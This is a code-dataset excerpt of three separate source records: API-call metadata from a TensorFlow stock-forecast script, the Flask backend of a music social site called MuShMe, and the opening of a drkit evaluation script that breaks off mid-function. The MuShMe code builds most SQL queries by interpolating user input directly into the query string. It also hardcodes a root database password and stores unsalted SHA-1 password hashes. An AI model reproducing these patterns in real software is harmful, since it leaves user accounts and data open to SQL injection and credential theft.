[((394, 420), 'tushare.get_hist_data', 'ts.get_hist_data', (['"""300750"""'], {}), "('300750')\n", (410, 420), True, 'import tushare as ts\n'), ((1660, 1704), 'tensorflow.keras.optimizers.Adam', 'tf.keras.optimizers.Adam', ([], {'learning_rate': '(0.01)'}), '(learning_rate=0.01)\n', (1684, 1704), True, 'import tensorflow as tf\n'), ((1926, 1953), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(19, 9)'}), '(figsize=(19, 9))\n', (1936, 1953), True, 'import matplotlib.pyplot as plt\n'), ((1959, 1968), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1966, 1968), True, 'import matplotlib.pyplot as plt\n'), ((2140, 2150), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2148, 2150), True, 'import matplotlib.pyplot as plt\n'), ((2193, 2207), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2205, 2207), True, 'import pandas as pd\n'), ((2492, 2519), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(19, 9)'}), '(figsize=(19, 9))\n', (2502, 2519), True, 'import matplotlib.pyplot as plt\n'), ((2597, 2607), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2605, 2607), True, 'import matplotlib.pyplot as plt\n'), ((2913, 2923), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2921, 2923), True, 'import matplotlib.pyplot as plt\n'), ((991, 1036), 'tensorflow.constant', 'tf.constant', (['dataset.values'], {'dtype': 'tf.float32'}), '(dataset.values, dtype=tf.float32)\n', (1002, 1036), True, 'import tensorflow as tf\n'), ((1174, 1233), 'tensorflow.constant', 'tf.constant', (['dataset.values[window_size:]'], {'dtype': 'tf.float32'}), '(dataset.values[window_size:], dtype=tf.float32)\n', (1185, 1233), True, 'import tensorflow as tf\n'), ((1249, 1293), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['ds_label'], {}), '(ds_label)\n', (1283, 1293), True, 'import tensorflow as tf\n'), ((2371, 2417), 'pandas.DataFrame', 'pd.DataFrame', (['fits'], {'columns': 'stock_catl.columns'}), '(fits, columns=stock_catl.columns)\n', (2383, 2417), True, 'import pandas as pd\n'), ((2799, 2845), 'pandas.DataFrame', 'pd.DataFrame', (['pres'], {'columns': 'stock_catl.columns'}), '(pres, columns=stock_catl.columns)\n', (2811, 2845), True, 'import pandas as pd\n'), ((1482, 1549), 'tensorflow.keras.layers.LSTM', 'tf.keras.layers.LSTM', (['(128)'], {'return_sequences': '(True)', 'activation': '"""relu"""'}), "(128, return_sequences=True, activation='relu')\n", (1502, 1549), True, 'import tensorflow as tf\n'), ((1559, 1603), 'tensorflow.keras.layers.LSTM', 'tf.keras.layers.LSTM', (['(128)'], {'activation': '"""relu"""'}), "(128, activation='relu')\n", (1579, 1603), True, 'import tensorflow as tf\n'), ((1613, 1638), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(13)'], {}), '(13)\n', (1634, 1638), True, 'import tensorflow as tf\n'), ((2292, 2355), 'tensorflow.expand_dims', 'tf.expand_dims', (['stock_catl.values[i:i + window_size, :]'], {'axis': '(0)'}), '(stock_catl.values[i:i + window_size, :], axis=0)\n', (2306, 2355), True, 'import tensorflow as tf\n'), ((2730, 2783), 'tensorflow.expand_dims', 'tf.expand_dims', (['dfp.values[-1 * window_size:]'], {'axis': '(0)'}), '(dfp.values[-1 * window_size:], axis=0)\n', (2744, 2783), True, 'import tensorflow as tf\n'), ((1051, 1094), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['ds_data'], {}), '(ds_data)\n', (1085, 1094), True, 'import tensorflow as tf\n'), ((1309, 1349), 'tensorflow.data.Dataset.zip', 'tf.data.Dataset.zip', (['(ds_data, 
ds_label)'], {}), '((ds_data, ds_label))\n', (1328, 1349), True, 'import tensorflow as tf\n')]
MuShMe/MuShMe
src/mushme.py
dbc9b940c827039016d7917d535882b47d7d8e5b
#!/usr/bin/env python # -*- coding: utf-8 -*- from src import app import os import shutil from flask import Flask, render_template, session, request, flash, url_for, redirect from Forms import ContactForm, LoginForm, editForm, ReportForm, CommentForm, searchForm, AddPlaylist from flask.ext.mail import Message, Mail from werkzeug import secure_filename from werkzeug import SharedDataMiddleware from api import API from songs import SONG from playlist import playlist from admin import admin from artist import artist import pymysql import hashlib from flask import g mail = Mail() mail.init_app(app) #For the collector script. app.register_blueprint(API); #For the songs app.register_blueprint(SONG); #For the playlist app.register_blueprint(playlist); #for the admin pages app.register_blueprint(admin); #for the artist pages app.register_blueprint(artist); UPLOAD_FOLDER = "img/ProfilePic/" ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif']) app.config['UPLOAD_FOLDER'] = 'src/static/' + UPLOAD_FOLDER @app.route('/') def index(): session["login"] = False session["signup"] = False session["logged_in"] = False return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=ContactForm(prefix='form2')) #For database connections. @app.before_request def before_request(): g.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='crimson', db='MuShMe', charset='utf8') g.database = g.conn.cursor() @app.teardown_request def teardown_request(exception): g.conn.close() @app.route('/login', methods=['POST']) def login(): session["login"] = True session["signup"] = False if request.method == 'POST': loginform = LoginForm(request.form, prefix='form1') if loginform.validate_on_submit(): check_login = g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ % (loginform.email.data, hashlib.sha1(loginform.password.data).hexdigest())) if check_login: userid= g.database.fetchone() g.database.execute("""UPDATE MuShMe.entries SET Last_Login=CURRENT_TIMESTAMP() WHERE User_id="%s" """ % (userid)) g.conn.commit() for uid in userid: session['userid'] = uid g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid ) session['UserName']=g.database.fetchone()[0] g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['privilege'] = g.database.fetchone()[0] g.database.execute("""SELECT Profile_pic FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['profilepic'] = g.database.fetchone()[0] g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid ) session["Name"]=g.database.fetchone() g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid ) session["dob"]=str(g.database.fetchone()) session['logged_in'] = True session['logged_in']=True #print uid #print userid return redirect(url_for('userProfile', userid=uid)) else: flash("Incorrect Email-Id or Password") else: flash("Incorrect Email-Id or Password") return render_template('homepage/index.html', form1=loginform, form2=ContactForm(prefix='form2')) else: return redirect(url_for(('index'))) def flash_errors(form): for field, errors in form.errors.items(): for error in errors: flash(u"Error in the %s field - %s" % ( getattr(form, field).label.text, error )) @app.route('/signup', methods=['POST']) def signup(): session["signup"] = True session["login"] = False contactform = ContactForm(request.form, prefix='form2') if contactform.validate_on_submit(): if 
validate(contactform.email.data,contactform.username.data): check_signup = g.database.execute("""INSERT into MuShMe.entries (Username,Email_id,Pwdhash,Name) VALUES ("%s","%s","%s","%s")""" % (contactform.username.data, contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest(),contactform.name.data, )) if check_signup: g.conn.commit() g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ % (contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest())) user_id = g.database.fetchone() for uid in user_id: session['userid'] = uid g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid ) session['UserName']=g.database.fetchone()[0] g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['privilege'] = g.database.fetchone()[0] g.database.execute("""SELECT Profile_Pic FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['profilepic'] = g.database.fetchone()[0] session['logged_in'] = True g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid ) session["Name"]=g.database.fetchone() g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid ) session["dob"]=str(g.database.fetchone()) newPlaylist = session['UserName'] + ' default collection' g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (newPlaylist,uid)) g.conn.commit() return redirect(url_for('userProfile',userid=uid)) else: flash("Please enter valid data !") else: flash("Username or Email has been taken") else: flash_errors(contactform) return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=contactform) def validate(email,username): email = g.database.execute(""" SELECT * from MuShMe.entries where Email_id="%s" """ % email) name = g.database.execute(""" SELECT * from MuShMe.entries where Username="%s" """ % username) if email or name: return False else: return True @app.route('/user/<userid>',methods=['GET']) def userProfile(userid): if session['logged_in'] == False: return render_template('error.html'), 404 else: if request.method == 'GET': User=getUserData(userid) return render_template('userprofile/index.html', userid=userid, form4=CommentForm(prefix='form4'), form3=editForm(prefix='form3'), form6=searchForm(prefix='form6'), form5=ReportForm(prefix='form5'),form7=AddPlaylist(prefix='form7'), friend=getFriend(userid), playlist=getPlaylist(userid), User=getUserData(userid), Comments=getComments(userid), songs=getSong(userid), Recommends=getRecommend(userid), Requests=getRequest(userid),frnd=checkFriend(userid,User), AllComments=getAllComments(userid), AllRecommends=getAllRecommend(userid)) def checkFriend(userid,User): friendName =[] g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % (userid)) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] friendName.append(data) for f in friendName: a=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid'])) b=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid'])) if a or b: return True elif userid == f['friendid']: return True else: return False g.database.execute("""SELECT User_id1 from friends WHERE 
User_id2="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] friendName.append(data) for f in friendName: a=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid'])) b=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid'])) if a or b: return True elif userid == f['friendid']: return True else: return False def getAllComments(userid): g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC" % (userid)) commentids = g.database.fetchall() retval = [] for commentid in commentids: g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0])) commentdata = g.database.fetchone() data = {} data['comment'] = commentdata[0] data['userid'] = commentdata[1] data['commentid'] = commentid[0] g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid'])) data['username'] = g.database.fetchone()[0] retval.append(data) return retval def getComments(userid): g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC LIMIT 5" % (userid)) commentids = g.database.fetchall() retval = [] for commentid in commentids: g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0])) commentdata = g.database.fetchone() data = {} data['comment'] = commentdata[0] data['userid'] = commentdata[1] data['commentid'] = commentid[0] g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid'])) data['username'] = g.database.fetchone()[0] retval.append(data) return retval def getFriend(userid): friendName =[] g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] data['friendpic']=a[2] friendName.append(data) g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] data['friendpic']=a[2] friendName.append(data) print friendName return friendName def getPlaylist(userid): playlist = [] g.database.execute("""SELECT Playlist_name,Playlist_id from MuShMe.playlists WHERE User_id="%s" """ % userid) for p in g.database.fetchall(): data = {} data['pname']=p[0] data['pid']=p[1] playlist.append(data) return playlist def getSong(userid): songName = [] g.database.execute("""SELECT Song_id from MuShMe.user_song WHERE User_id=%s LIMIT 5""" % userid) for song in g.database.fetchall(): data = {} g.database.execute("""SELECT Song_title,Song_id,Song_Album from MuShMe.songs WHERE Song_id="%s" """ % song) for a in g.database.fetchall(): data['songname']=a[0] data['songid']=a[1] g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s " % (a[2])) g.conn.commit() data['art'] = g.database.fetchone()[0] songName.append(data) return songName def getUserData(userid): User = [] g.database.execute(""" SELECT 
Username,User_id,Profile_pic,Privilege,Email_id,Name,DOB from entries where User_id="%s" """ % userid) for a in g.database.fetchall(): data={} data['username']=a[0] data['userid']=a[1] data['profilepic'] = a[2] data['privilege']=a[3] data['email']=a[4] data['name']=a[5] data['dob']=str(a[6]) User.append(data) return User def getAllRecommend(userid): recommend =[] g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" """ % userid) for a in g.database.fetchall(): data={} data['rid']=a[0] data['userfrom'] = a[1] data['userto']=a[2] g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1]) data['userfromname'] = g.database.fetchone()[0] check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0]) if check_song: songid = g.database.fetchone()[0] data['song'] = [] g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid) for song in g.database.fetchall(): d = {} d['title']=song[0] d['album'] = song[1] d['genre'] = song[2] d['publisher'] = song[3] d['songid'] = songid data['song'].append(d) check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0]) if check_playlist: playlistid = g.database.fetchone()[0] data['playlist'] = [] g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid) for p in g.database.fetchall(): d= {} d['pname']=p[0] d['pid']=p[1] g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2]) for k in g.database.fetchall(): d['username']=k[0] d['uname']=k[1] d['userid']=k[2] data['playlist'].append(d) recommend.append(data) return recommend def getRecommend(userid): recommend =[] g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" LIMIT 5 """ % userid) for a in g.database.fetchall(): data={} data['rid']=a[0] data['userfrom'] = a[1] data['userto']=a[2] g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1]) data['userfromname'] = g.database.fetchone()[0] print data['userfromname'] check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0]) if check_song: songid = g.database.fetchone()[0] data['song'] = [] g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid) for song in g.database.fetchall(): d = {} d['title']=song[0] d['album'] = song[1] d['genre'] = song[2] d['publisher'] = song[3] d['songid'] = songid d['songart'] = getSongArt(songid) data['song'].append(d) check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0]) if check_playlist: playlistid = g.database.fetchone()[0] data['playlist'] = [] g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid) for p in g.database.fetchall(): d= {} d['pname']=p[0] d['pid']=p[1] g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2]) for k in g.database.fetchall(): d['username']=k[0] d['uname']=k[1] d['userid']=k[2] data['playlist'].append(d) recommend.append(data) return recommend def getRequest(userid): request =[] g.database.execute(""" SELECT Request_id,Request_from,Request_to,Status from requests where Request_to="%s" """ % userid) for a in 
g.database.fetchall(): data={} data['reqid']=a[0] data['reqfrom'] = a[1] data['reqto']=a[2] data['status']=a[3] data['reqfromuser'] = [] g.database.execute(""" SELECT User_id,Username,Name from entries where User_id='%s' """ % a[1]) for i in g.database.fetchall(): d={} d['userid'] = i[0] d['username'] = i[1] d['name'] = i[2] data['reqfromuser'].append(d) print data request.append(data) return request def getSongArt(songid): g.database.execute("SELECT Song_Album FROM songs WHERE song_id=%s", (songid)) albumname = g.database.fetchone()[0] g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s", (albumname)) return g.database.fetchone()[0] @app.route('/user/<userid>/edit',methods=['POST','GET']) def editName(userid): if request.method == 'POST': uid = userid print request.form if request.form['editname'] != '': g.database.execute("""UPDATE MuShMe.entries SET Name=%s WHERE User_id=%s """, ([request.form['editname']], userid)) g.conn.commit() if request.form['birthday_year'] != '0' and request.form['birthday_month'] != '0' and request.form['birthday_day'] != '0': g.database.execute("""UPDATE MuShMe.entries SET DOB="%s-%s-%s" WHERE User_id="%s" """ % (request.form['birthday_year'],request.form['birthday_month'],request.form['birthday_day'], userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) else: return redirect(url_for('userProfile', userid=userid)) def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS @app.route('/user/<userid>/file', methods=['GET', 'POST']) def upload_file(userid): if request.method == 'POST': file = request.files['file'] if file and allowed_file(file.filename): filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) filepath = UPLOAD_FOLDER + filename session['profilepic'] = filepath g.database.execute("""UPDATE MuShMe.entries SET Profile_pic="%s" WHERE User_id="%s" """ % (filepath, userid)) g.conn.commit() return redirect(url_for('userProfile', userid=userid)) app.add_url_rule('/user/uploads/<filename>', 'uploaded_file',build_only=True) app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/user/uploads': 'src/static' + app.config['UPLOAD_FOLDER'] }) @app.route('/user/<rcvrid>.<senderid>/comment',methods=['POST','GET']) def comment(rcvrid, senderid): if request.method == 'POST': commentform = CommentForm(request.form, prefix='form4') #print senderid #print rcvrid if commentform.comment.data: query = ("""INSERT INTO MuShMe.comments (comment_type, Comment, User_id) VALUES ("%s","%s","%s") """ % ('U',commentform.comment.data, senderid)) print query g.database.execute(query) g.conn.commit() g.database.execute("""SELECT Comment_id from MuShMe.comments WHERE Comment="%s" """ % (commentform.comment.data)) data = g.database.fetchone()[0] #print data enter_comment = g.database.execute("""INSERT INTO MuShMe.user_comments (Comment_id, User_id) VALUES ("%s","%s")""" % (data,rcvrid)) if enter_comment: g.conn.commit() g.database.execute("""SELECT User_id FROM MuShMe.user_comments WHERE Comment_id="%s" """ % data) #print g.database.fetchone()[0] return redirect(url_for('userProfile', userid=rcvrid)) @app.route('/user/<userid>/<commentid>/report',methods=['POST','GET']) def report(userid,commentid): if request.method == 'POST': reportform = ReportForm(request.form, prefix='form5') print reportform.report.data check_report = g.database.execute("""INSERT INTO MuShMe.complaints (Complain_type, Complain_description, Comment_id,reported_by) VALUES 
("%s","%s","%s","%s") """ % (reportform.report.data, reportform.other.data, commentid, session['userid'] )) if check_report == True: g.conn.commit() return redirect(url_for('userProfile', userid=userid)) else: return redirect(url_for('userProfile', userid=userid)) @app.route('/user/<uidto>.<uidfrom>/request',methods=['POST']) def sendrequest(uidto,uidfrom): if request.method == 'POST': if requestvalidate(uidfrom,uidto): query=(""" INSERT INTO requests (Request_from,Request_to,Status) VALUES ("%s","%s","%s") """ % (uidfrom,uidto,1)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=uidto)) @app.route('/user/<userto>.<userfrom>/accept',methods=['POST']) def acceptrequest(userto,userfrom): if request.method == 'POST': query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (0,userfrom,userto)) g.database.execute(query) g.conn.commit() query = (""" INSERT INTO friends Values ("%s","%s") """ % (userfrom,userto)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=userto)) @app.route('/user/<userto>.<userfrom>/reject',methods=['POST']) def rejectrequest(userto,userfrom): if request.method == 'POST': query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (-1,userfrom,userto)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=userto)) def requestvalidate(userfrom,userto): check = g.database.execute(""" SELECT Status from requests where Request_to="%s" and Request_from="%s" """ % (userfrom,userto)) if check and g.database.fetchone()[0]=='-1' and userfrom!=userto: return False else: return True @app.route('/search',methods=['POST','GET']) def search(): if request.method == 'POST': searchform = searchForm(prefix='form6') #print 'f' value = searchform.entry.data + '%' search_fname = [] search_song= [] search_friend = [] search_playlist =[] search_artist = [] check_song = g.database.execute("""SELECT Song_title,Song_Album,Genre,Publisher,Song_id from MuShMe.songs WHERE Song_title LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data={} data['title']=a[0] data['album']=a[1] data['genre']=a[2] data['publisher']=a[3] data['songid']=a[4] data['art']=getSongArt(a[4]) search_song.append(data) check_artist = g.database.execute("""SELECT Artist_name, Artist_id from MuShMe.artists WHERE Artist_name LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data = {} data['artistname']=a[0] data['artistid']=a[1] search_artist.append(data) check_friend = g.database.execute("""SELECT Username, Name, Profile_pic, User_id from MuShMe.entries WHERE Username LIKE "%s" or Name LIKE "%s" """ % ( value, value )) for a in g.database.fetchall(): data = {} data['username']=a[0] data['name']=a[1] data['profilepic']=a[2] data['userid']=a[3] search_friend.append(data) check_playlist = g.database.execute("""SELECT Playlist_name,User_id, Playlist_id from MuShMe.playlists WHERE Playlist_name LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data = {} data['pname']=a[0] data['pid']=a[2] g.database.execute(""" SELECT Username, Name from MuShMe.entries WHERE User_id="%s" """ % a[1]) for k in g.database.fetchall(): data['username']=k[0] data['uname']=k[1] search_playlist.append(data) length = len(search_playlist) + len(search_song) + len(search_friend) + len(search_artist) + len(search_fname) return render_template('searchpage/search.html', entry=searchform.entry.data,form6=searchForm(prefix='form6'), search_song=search_song, 
search_artist=search_artist,friends=search_friend, search_playlist=search_playlist,length = length) else: return render_template('searchpage/search.html',form6=searchForm(prefix='form6')) @app.route('/user/<userid>/addplaylist',methods=['POST']) def addplaylist(userid): if request.method=='POST': addplaylistform = AddPlaylist(prefix='form7') g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (addplaylistform.add.data,userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) @app.route("/playlist/<userid>/deleteplaylist", methods=["POST"]) def deleteplaylist(userid): playlist = request.form.getlist('playlistselect') for playlistid in playlist: g.database.execute("""DELETE FROM playlists WHERE Playlist_id=%s and User_id=%s """ % (playlistid, userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) #All your profile are belong to us. @app.route('/artist/<artistid>') def artistProfile(artistid): return render_template('artistpage/index.html',form6=searchForm(prefix='form6')) #To handle 404 not found errors @app.errorhandler(404) def page_not_found_error(error): return render_template('error.html'), 404 @app.route('/termsofservices') def tos(): return render_template('tos.html') @app.route('/about') def about(): return render_template('about.html') @app.route('/changepwd') def changepwd(): return render_template('changepwd.html') @app.route('/logout') def logout(): if 'email' not in session: return render_template('error.html') session['logged_in']=False return render_template('login.html') if not app.debug: import logging from logging.handlers import SMTPHandler mail_handler = SMTPHandler('127.0.0.1', '[email protected]', app.config['DEFAULT_MAIL_SENDER'], 'YourApplication Failed') mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) from logging import FileHandler file_handler = FileHandler('log.txt') file_handler.setLevel(logging.WARNING) app.logger.addHandler(file_handler) from logging import Formatter mail_handler.setFormatter(Formatter(''' Message type: %(levelname)s Location: %(pathname)s:%(lineno)d Module: %(module)s Function: %(funcName)s Time: %(asctime)s Message: %(message)s ''')) if __name__ == """__main__""": # To allow aptana to receive errors, set use_debugger=False app = create_app(config="""config.yaml""") if app.debug: use_debugger = True try: # Disable Flask's debugger if external debugger is requested use_debugger = not(app.config.get('DEBUG_WITH_APTANA')) except: pass app.run(use_debugger=use_debugger, use_reloader=use_debugger, threaded=True, port=8080)
[]
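Editorial note on the Flask application above: every route builds its SQL by interpolating user input straight into the query string, which is the textbook SQL-injection pattern. Below is a minimal sketch (not part of the MuShMe source) of the safer alternative using pymysql's parameterized execute(); the connection settings mirror the ones in before_request(), and the user id is a hypothetical value.

import pymysql

conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
                       passwd='crimson', db='MuShMe', charset='utf8')
cursor = conn.cursor()

user_id = 42  # hypothetical value; in the app this would come from the session
# The driver escapes the arguments itself, so no manual string formatting is needed.
cursor.execute("SELECT Username, Name FROM entries WHERE User_id = %s", (user_id,))
row = cursor.fetchone()
conn.close()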
Xtuden-com/language
language/labs/drkit/evaluate.py
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Evaluate lazy slot filling results.""" import codecs import collections import gzip import json import random import re import string import unicodedata from absl import app from absl import flags from bert import tokenization from language.labs.drkit import input_fns import numpy as np import tensorflow.compat.v1 as tf PUNCTUATION = frozenset(string.punctuation) FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string("ground_truth_file", None, "File with ground truth answers.") flags.DEFINE_string("predicted_answers_file", None, "File with predicted answers from model.") flags.DEFINE_string("relation_counts_file", None, "JSON file with relation counts.") class NumpyEncoder(json.JSONEncoder): """Special json encoder for numpy types.""" def default(self, obj): if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32, np.uint64)): return int(obj) elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)): return float(obj) elif isinstance(obj, (np.ndarray,)): # This is the fix return obj.tolist() return json.JSONEncoder.default(self, obj) def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file, **kwargs): """Compute evaluation metrics for OneHopDataset or TwoHopDataset. Args: dataset: An object of type OneHopDataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # Collect ground truth answers. gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples} gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples} gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples} inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples} # Compute basic metrics. num_correct = 0. all_predictions = {} chain2stats = {ch: [0., 0.] 
for ch in inf_chain.values()} incorrect_results, correct_results = [], [] for result in results: qas_id = result["qas_ids"] prediction = result["predictions"] if prediction in gt_answer[qas_id]: num_correct += 1 chain2stats[inf_chain[qas_id]][0] += 1 correct_results.append({ "qas_id": result["qas_ids"], "question": gt_ques[qas_id], "answers": gt_answer[qas_id], "subject": gt_entity[qas_id], "inf-chain": inf_chain[qas_id], "predictions": result["predictions"], }) for hop in range(3): if "sparse_%d" % hop in result: correct_results[-1].update({ "sparse_%d" % hop: result["sparse_%d" % hop], "dense_%d" % hop: result["dense_%d" % hop], "mention_%d" % hop: result["mention_%d" % hop], "entity_%d" % hop: result["entity_%d" % hop], "sparse_scores_%d" % hop: result["sparse_scores_%d" % hop], "dense_scores_%d" % hop: result["dense_scores_%d" % hop], "mention_scores_%d" % hop: result["mention_scores_%d" % hop], "entity_scores_%d" % hop: result["entity_scores_%d" % hop], }) else: incorrect_results.append({ "qas_id": result["qas_ids"], "question": gt_ques[qas_id], "answers": gt_answer[qas_id], "subject": gt_entity[qas_id], "inf-chain": inf_chain[qas_id], "predictions": result["predictions"], }) for hop in range(3): if "sparse_%d" % hop in result: incorrect_results[-1].update({ "sparse_%d" % hop: result["sparse_%d" % hop], "dense_%d" % hop: result["dense_%d" % hop], "mention_%d" % hop: result["mention_%d" % hop], "entity_%d" % hop: result["entity_%d" % hop], "sparse_scores_%d" % hop: result["sparse_scores_%d" % hop], "dense_scores_%d" % hop: result["dense_scores_%d" % hop], "mention_scores_%d" % hop: result["mention_scores_%d" % hop], "entity_scores_%d" % hop: result["entity_scores_%d" % hop], }) chain2stats[inf_chain[qas_id]][1] += 1 all_predictions[qas_id] = name_map[str(prediction)] accuracy = num_correct / len(all_predictions) json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) json.dump( random.sample(incorrect_results, 100), tf.gfile.Open(output_prediction_file + ".incorrect", "w"), cls=NumpyEncoder) json.dump( random.sample(correct_results, 100), tf.gfile.Open(output_prediction_file + ".correct", "w"), cls=NumpyEncoder) # Return metrics. metrics = { "accuracy": accuracy, } for ch, stats in chain2stats.items(): metrics["inference-chains-acc/" + ch] = stats[0] / stats[1] return metrics def multihop_eval_fn(dataset, results, name_map, output_prediction_file, supervision="mention", **kwargs): """Compute evaluation metrics for OneHopDataset or TwoHopDataset. Args: dataset: An object of type OneHopDataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. supervision: Type of supervision used in the model. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # 